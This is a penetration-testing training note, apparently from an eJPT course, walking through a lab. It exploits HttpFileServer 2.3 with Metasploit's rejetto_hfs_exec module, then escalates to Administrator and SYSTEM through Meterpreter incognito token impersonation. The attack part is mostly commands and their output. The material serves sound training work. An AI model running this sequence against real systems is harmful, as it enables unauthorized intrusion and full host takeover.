INE Training Notes - by syselement
🏠 Home BlogGitHub📚 Buy Me a Book
  • INE Training Notes
  • Courses
    • eJPT - PTSv2
      • 📒Penetration Testing Prerequisites
        • Introduction
        • Networking
        • Web Applications
      • 📒1. Assessment Methodologies & Auditing
        • Information Gathering
        • Footprinting & Scanning
        • Enumeration
          • 🔬SMB Enum
          • 🔬FTP Enum
          • 🔬SSH Enum
          • 🔬HTTP Enum
          • 🔬MYSQL Enum
          • 🔬SMTP Enum
        • Vulnerability Assessment
        • Auditing Fundamentals
      • 📒2. Host & Network Penetration Testing
        • System/Host Based Attacks
          • 🪟Windows Attacks
            • 🔬IIS - WebDAV
            • 🔬SMB - PsExec
            • 🔬RDP
            • 🔬WinRM
            • 🔬Win Kernel Privesc
            • 🔬UAC Bypass
            • 🔬Access Token
            • 🔬Alternate Data Stream
            • 🔬Credentials Dumping
          • 🐧Linux Attacks
            • 🔬Bash
            • 🔬FTP
            • 🔬SSH
            • 🔬SAMBA
            • 🔬Cron Jobs
            • 🔬SUID
            • 🔬Hashes Dumping
        • Network Based Attacks
          • 🔬Tshark, ARP, WiFi
        • The Metasploit Framework (MSF)
          • 🔬HFS - MSF Exploit
          • 🔬Tomcat - MSF Exploit
          • 🔬FTP - MSF Exploit
          • 🔬Samba - MSF Exploit
          • 🔬SSH - MSF Exploit
          • 🔬SMTP - MSF Exploit
          • 🔬Meterpreter - MSF
          • 🔬Win Post Exploitation - MSF
          • 🔬Linux Post Exploitation - MSF
        • Exploitation
          • 🔬Fixing Exploits - HFS
          • 🔬Win Workflow Platform - MSF
          • 🔬Win Black Box Pentest
          • 🔬Linux Black Box Pentest
        • Post-Exploitation
          • 🔬Windows Post-Exploitation
          • 🔬Windows Privilege Escalation
          • 🔬Windows Persistence
          • 🔬Linux Post-Exploitation
          • 🔬Linux Privilege Escalation
          • 🔬Linux Persistence
          • 🔬Cracking Hashes
          • 🔬Pivoting
        • Social Engineering
      • 📒3. Web Application Penetration Testing
        • Intro to Web App Pentesting
          • 🔬HTTP Enumeration
          • 🔬Web App Scanning
          • 🔬Web App Attacks
      • 🔬Exam Preparation - Labs
        • PTSv1 Prerequisites Labs
          • 🔬HTTP(S) Traffic Sniffing
          • 🔬Find the Secret Server
          • 🔬Data Exfiltration
          • 🔬Burp Suite Basics - Directory Enumeration
        • PTSv2 Practice Labs
      • 🌐eJPT References
      • 📜eJPT Cheat Sheet
    • ICCA
      • 📒1. Cloud Foundations
      • 📒2. Cloud Management Concepts
      • 📒3. Cloud Identity, Security, and Compliance
      • 🌐Icca References
    • eMAPT
      • 📒Android
      • 📒iOS
      • 🌐eMAPT References
  • 🏠syselement's Blog Home
Powered by GitBook
On this page
  • Lab 1
  • Enumeration
  • Exploitation
  • Privilege Escalation

Was this helpful?

Edit on GitHub
  1. Courses
  2. eJPT - PTSv2
  3. 📒2. Host & Network Penetration Testing
  4. System/Host Based Attacks
  5. Windows Attacks

🔬Access Token

Previous🔬UAC BypassNext🔬Alternate Data Stream

Last updated 2 years ago

Was this helpful?

Lab 1

🔬

  • Target IP: 10.4.22.75

  • Access Token impersonation

Enumeration

nmap 10.4.22.75
PORT      STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
  • Determine the version information of the web server on port 80

nmap -sV -p 80 10.4.22.75
80/tcp open  http    HttpFileServer httpd 2.3
  • Without using nmap, the http server version can be checked in a browser by opening the link

    • http://10.4.22.75/

Exploitation

searchsploit hfs
msfconsole -q
  • Set the target IP as GLOBAL RHOSTS variable

setg RHOSTS 10.4.22.75
search rejetto
use exploit/windows/http/rejetto_hfs_exec
options
exploit
sysinfo
    Computer        : ATTACKDEFENSE
    OS              : Windows 2016+ (10.0 Build 17763).
    Architecture    : x64
    System Language : en_US
    Meterpreter     : x86/windows
  • Migrate current x86 meterpreter session to a x64 process

pgrep explorer
migrate 3640
    [*] Migrating from 1692 to 3640...
    [-] core_migrate: Operation failed: Access is denied.

getuid
	Server username: NT AUTHORITY\LOCAL SERVICE
# LOCAL SERVICE account is by default unprivileged

getprivs
    SeAssignPrimaryTokenPrivilege
    SeAuditPrivilege
    SeChangeNotifyPrivilege
    SeCreateGlobalPrivilege
    SeImpersonatePrivilege
    SeIncreaseQuotaPrivilege
    SeIncreaseWorkingSetPrivilege
    SeSystemtimePrivilege
    SeTimeZonePrivilege
  • This meterpreter session (with this particular user account) can be utilized to impersonate other access tokens available.

Privilege Escalation

Access Token Impersonation

load incognito
# if the session dies, run the exploit again
list_tokens -u

    Delegation Tokens Available # Interactive Logon
    ========================================
    ATTACKDEFENSE\Administrator
    NT AUTHORITY\LOCAL SERVICE

    Impersonation Tokens Available # Non-Interactive Logon
    ========================================
    No tokens available
  • ATTACKDEFENSE\Administrator account access token would provide elevated privileges

impersonate_token "ATTACKDEFENSE\Administrator"

getuid
	Server username: ATTACKDEFENSE\Administrator
getprivs
	[-] stdapi_sys_config_getprivs: Operation failed: Access is denied.
pgrep explorer
migrate 3640

getprivs
  • Listing tokens with this account, there can be additional available tokens

list_tokens -u

    Delegation Tokens Available
    ========================================
    ATTACKDEFENSE\Administrator
    NT AUTHORITY\LOCAL SERVICE
    NT AUTHORITY\SYSTEM
    Window Manager\DWM-1

    Impersonation Tokens Available
    ========================================
    Font Driver Host\UMFD-0
    Font Driver Host\UMFD-1
    NT AUTHORITY\NETWORK SERVICE
  • NT AUTHORITY\SYSTEM can be impersonated, getting the privileges associated with its access token

impersonate_token "NT AUTHORITY\SYSTEM"
  • In the case of no Delegation or Impersonation tokens found, the Potato Attack can be used to get or generate a NT AUTHORITY/SYSTEM access token, impersonating it and obtain privileges associated to it.

  • Get the flag of the lab:

cd C:\\Users\\Administrator\\Desktop\\
Reveal Flag: 🚩

x28c832a39730b7d46d6c38f1ea18e12


🪟
Privilege Escalation: Impersonate
incognito Meterpreter module
Access Token Impersonation